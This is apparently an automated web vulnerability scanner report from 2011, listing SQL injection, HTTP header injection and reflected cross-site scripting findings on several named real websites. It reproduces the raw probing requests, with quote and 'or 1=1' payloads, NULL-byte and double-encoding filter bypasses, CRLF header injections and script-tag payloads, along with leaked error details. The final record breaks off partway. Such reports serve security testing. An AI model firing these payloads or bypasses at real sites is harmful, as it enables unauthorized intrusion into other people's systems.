SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.
The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /cat/48/1/40836/Netsparker3fca331e008f470991bca348524bafeb.aspx' HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.bizfind.us Cookie: ASPSESSIONIDSABCCQDR=PCGGLIGCIOIEPGPAOPKKIALI Accept-Encoding: gzip, deflate
The id parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the id parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1<br /><br /><textarea rows="10" cols="100">SEL ...[SNIP]... </textarea> Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/get-image.php on line 15
Warning: fopen(../images/not-found.jpg): failed to open stream: No such file or directory in /home/chroot/home/james/safari/get-ima ...[SNIP]...
1.3. http://www.caribbean-ocean.com/get-image.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.caribbean-ocean.com
Path:
/get-image.php
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'2652' at line 1<br /><br /><textarea rows="10" cols="100" ...[SNIP]... </textarea> Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/get-image.php on line 15
Warning: fopen(../images/not-found.jpg): failed to open stream: No such file or directory in /home/chroot/home/james/safari/get-ima ...[SNIP]...
The action parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the action parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Wed, 20 Apr 2011 02:45:35 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 Content-language: en Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 20028
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"> ...[SNIP]... FROM category cat, sub_category subcat WHERE cat.category_id = subcat.category_id AND LOWER(subcat.sub_category_name) = 'index.php?title=-&action=raw'&gen=js&useskin=monobook' You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 5
The title parameter appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the title parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
HTTP/1.1 200 OK Date: Wed, 20 Apr 2011 02:44:07 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 Content-language: en Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 20184
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"> ...[SNIP]... WHERE cat.category_id = subcat.category_id AND LOWER(subcat.sub_category_name) = 'index.php?title=mediawiki:monobook.css%00'&usemsgcache=yes&action=raw&ctype=text/css&smaxage=18000' You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 5
The CategoryID parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the CategoryID parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request
GET /careers.php?CategoryID=23' HTTP/1.1 Host: www.nutter.com Proxy-Connection: keep-alive Referer: http://www.nutter.com/careers.php User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1 | 1064<BR>sql: SELEC ...[SNIP]...
The ASP.NET_SessionId cookie appears to be vulnerable to SQL injection attacks. The payloads 14542449'%20or%201%3d1--%20 and 14542449'%20or%201%3d2--%20 were each submitted in the ASP.NET_SessionId cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
The CurrentROLSession cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the CurrentROLSession cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Request 1
GET /Register/WebResource.axd HTTP/1.1 Host: www.regonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CurrentROLSession=%2527; ASP.NET_SessionId=ijxz0lanc0imgk55mhf2eu45; %5FrolStats%5FID=DD22D651-4279-4259-A501-EA38CE56381F;
Response 1 (redirected)
HTTP/1.1 200 OK Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Vary: Accept-Encoding Cache-Control: private Content-Type: text/html; charset=utf-8 Date: Tue, 19 Apr 2011 19:40:19 GMT Connection: close X-Powered-By: ASP.NET Content-Length: 19098
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head><title>
GET /Register/WebResource.axd HTTP/1.1 Host: www.regonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CurrentROLSession=%2527%2527; ASP.NET_SessionId=ijxz0lanc0imgk55mhf2eu45; %5FrolStats%5FID=DD22D651-4279-4259-A501-EA38CE56381F;
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="https://regonline.activeeurope.com/__404.aspx">here</a>.</h2> </body></html>
2. HTTP header injectionpreviousnext There are 3 instances of this issue:
HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
2.1. http://www.regonline.com/marketing/event/features/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.regonline.com
Path:
/marketing/event/features/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload da698%00%0d%0a3fd008c10bf was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.
The application attempts to block header injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the newline characters.
Request
GET /marketing/event/features/?da698%00%0d%0a3fd008c10bf=1 HTTP/1.1 Host: www.regonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CurrentROLSession=; ASP.NET_SessionId=ijxz0lanc0imgk55mhf2eu45; %5FrolStats%5FID=DD22D651-4279-4259-A501-EA38CE56381F;
Response
HTTP/1.1 301 moved permanently Content-Type: text/html Date: Tue, 19 Apr 2011 19:40:40 GMT Location: http://www.regonline.com/__features/?da698 3fd008c10bf=1: Connection: close Content-Length: 0
2.2. http://www.regonline.com/marketing/event/pricing/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.regonline.com
Path:
/marketing/event/pricing/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload a2d40%00%0d%0ab15c88885b1 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.
The application attempts to block header injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the newline characters.
Request
GET /marketing/event/pricing/?a2d40%00%0d%0ab15c88885b1=1 HTTP/1.1 Host: www.regonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CurrentROLSession=; ASP.NET_SessionId=ijxz0lanc0imgk55mhf2eu45; %5FrolStats%5FID=DD22D651-4279-4259-A501-EA38CE56381F;
Response
HTTP/1.1 301 moved permanently Content-Type: text/html Date: Tue, 19 Apr 2011 19:40:35 GMT Location: http://www.regonline.com/__pricing/?a2d40 b15c88885b1=1: Connection: close Content-Length: 0
2.3. http://www.regonline.com/marketing/event/testimonials/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.regonline.com
Path:
/marketing/event/testimonials/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 8fca8%0d%0acb9e5a58209 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.
Request
GET /marketing/event/testimonials/?8fca8%0d%0acb9e5a58209=1 HTTP/1.1 Host: www.regonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CurrentROLSession=; ASP.NET_SessionId=ijxz0lanc0imgk55mhf2eu45; %5FrolStats%5FID=DD22D651-4279-4259-A501-EA38CE56381F;
Response
HTTP/1.1 301 moved permanently Content-Type: text/html Date: Tue, 19 Apr 2011 19:40:35 GMT Location: http://www.regonline.com/__resources/?8fca8 cb9e5a58209=1: Connection: close Content-Length: 0
3. Cross-site scripting (reflected)previous There are 195 instances of this issue:
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 77cef<script>alert(1)</script>e7b87124b3c was submitted in the c1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=777cef<script>alert(1)</script>e7b87124b3c&c2=7400849&c3=1&c4=&c5=&c6= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://blog.viglink.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=25894b9d-24.143.206.177-1303083414
The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload f29b7<script>alert(1)</script>6928a4854ea was submitted in the c15 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=2&c2=6036034&c3=&c4=/clips15540%2522%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253Ef37e55f8e40/360434/god-bless-you-captain-hindsight&c5=20000&c6=&c15=f29b7<script>alert(1)</script>6928a4854ea HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.southparkstudios.com/clips15540%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef37e55f8e40/360434/god-bless-you-captain-hindsight User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=25894b9d-24.143.206.177-1303083414
The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload b1411<script>alert(1)</script>c556e7c19dc was submitted in the c2 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=7&c2=7400849b1411<script>alert(1)</script>c556e7c19dc&c3=1&c4=&c5=&c6= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://blog.viglink.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=25894b9d-24.143.206.177-1303083414
The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload d261f<script>alert(1)</script>90e70e35545 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=7&c2=7400849&c3=1d261f<script>alert(1)</script>90e70e35545&c4=&c5=&c6= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://blog.viglink.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=25894b9d-24.143.206.177-1303083414
The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 78b30<script>alert(1)</script>5454f96e47f was submitted in the c4 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=7&c2=7400849&c3=1&c4=78b30<script>alert(1)</script>5454f96e47f&c5=&c6= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://blog.viglink.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=25894b9d-24.143.206.177-1303083414
The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 65838<script>alert(1)</script>7988e0f5ce8 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=7&c2=7400849&c3=1&c4=&c5=65838<script>alert(1)</script>7988e0f5ce8&c6= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://blog.viglink.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=25894b9d-24.143.206.177-1303083414
The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 4118b<script>alert(1)</script>4ac7260861d was submitted in the c6 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=7&c2=7400849&c3=1&c4=&c5=&c6=4118b<script>alert(1)</script>4ac7260861d HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://blog.viglink.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=25894b9d-24.143.206.177-1303083414
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2aed"><script>alert(1)</script>ea1579b376b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/247B3a2aed"><script>alert(1)</script>ea1579b376b/Dominos/11Q2/CPC/728/11060627171@x90 HTTP/1.1 Host: b3.mookie1.com Proxy-Connection: keep-alive Referer: http://redcated/APM/iview/142856423/direct;wi.728;hi.90/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=000014ac0000000000000000/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/relocate= User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW802rT5oABV/F; NSC_o4efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; Dominos=247B3; dlx_20100929=set; other_20110126=set; id=914804995789526; session=1303242610|1303242610
Response
HTTP/1.1 200 OK Date: Tue, 19 Apr 2011 20:04:55 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 344 Content-Type: text/html
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ae76"><script>alert(1)</script>e6d8e4920b2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/247B3/Dominos8ae76"><script>alert(1)</script>e6d8e4920b2/11Q2/CPC/728/11060627171@x90 HTTP/1.1 Host: b3.mookie1.com Proxy-Connection: keep-alive Referer: http://redcated/APM/iview/142856423/direct;wi.728;hi.90/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=000014ac0000000000000000/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/relocate= User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW802rT5oABV/F; NSC_o4efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; Dominos=247B3; dlx_20100929=set; other_20110126=set; id=914804995789526; session=1303242610|1303242610
Response
HTTP/1.1 200 OK Date: Tue, 19 Apr 2011 20:04:57 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 346 Content-Type: text/html
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa50c"><script>alert(1)</script>f435d50f889 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/247B3/Dominos/11Q2fa50c"><script>alert(1)</script>f435d50f889/CPC/728/11060627171@x90 HTTP/1.1 Host: b3.mookie1.com Proxy-Connection: keep-alive Referer: http://redcated/APM/iview/142856423/direct;wi.728;hi.90/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=000014ac0000000000000000/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/relocate= User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW802rT5oABV/F; NSC_o4efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; Dominos=247B3; dlx_20100929=set; other_20110126=set; id=914804995789526; session=1303242610|1303242610
Response
HTTP/1.1 200 OK Date: Tue, 19 Apr 2011 20:04:59 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 345 Content-Type: text/html
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63980"><script>alert(1)</script>f41eb06de7c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/247B3/Dominos/11Q2/CPC63980"><script>alert(1)</script>f41eb06de7c/728/11060627171@x90 HTTP/1.1 Host: b3.mookie1.com Proxy-Connection: keep-alive Referer: http://redcated/APM/iview/142856423/direct;wi.728;hi.90/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=000014ac0000000000000000/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/relocate= User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW802rT5oABV/F; NSC_o4efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; Dominos=247B3; dlx_20100929=set; other_20110126=set; id=914804995789526; session=1303242610|1303242610
Response
HTTP/1.1 200 OK Date: Tue, 19 Apr 2011 20:05:01 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 344 Content-Type: text/html
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c367"><script>alert(1)</script>9f4a0217226 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/247B3/Dominos/11Q2/CPC/7285c367"><script>alert(1)</script>9f4a0217226/11060627171@x90 HTTP/1.1 Host: b3.mookie1.com Proxy-Connection: keep-alive Referer: http://redcated/APM/iview/142856423/direct;wi.728;hi.90/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=000014ac0000000000000000/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/relocate= User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW802rT5oABV/F; NSC_o4efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; Dominos=247B3; dlx_20100929=set; other_20110126=set; id=914804995789526; session=1303242610|1303242610
Response
HTTP/1.1 200 OK Date: Tue, 19 Apr 2011 20:05:03 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 346 Content-Type: text/html
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db4ff"><script>alert(1)</script>9cb16008c26 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/247B3/Dominos/11Q2/CPC/728/11060627171@x90db4ff"><script>alert(1)</script>9cb16008c26 HTTP/1.1 Host: b3.mookie1.com Proxy-Connection: keep-alive Referer: http://redcated/APM/iview/142856423/direct;wi.728;hi.90/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=000014ac0000000000000000/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/relocate= User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW802rT5oABV/F; NSC_o4efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; Dominos=247B3; dlx_20100929=set; other_20110126=set; id=914804995789526; session=1303242610|1303242610
Response
HTTP/1.1 200 OK Date: Tue, 19 Apr 2011 20:05:06 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 337 Content-Type: text/html
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3091d"><script>alert(1)</script>6f772d0085e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/247B33091d"><script>alert(1)</script>6f772d0085e/Dominos/11Q2/CPC/728/11959749775@x90 HTTP/1.1 Host: b3.mookie1.com Proxy-Connection: keep-alive Referer: http://redcated/APM/iview/142856423/direct;wi.728;hi.90/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=000014ac0000000000000000/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/relocate= User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW802rT5oABV/F; id=914804995789526
Response
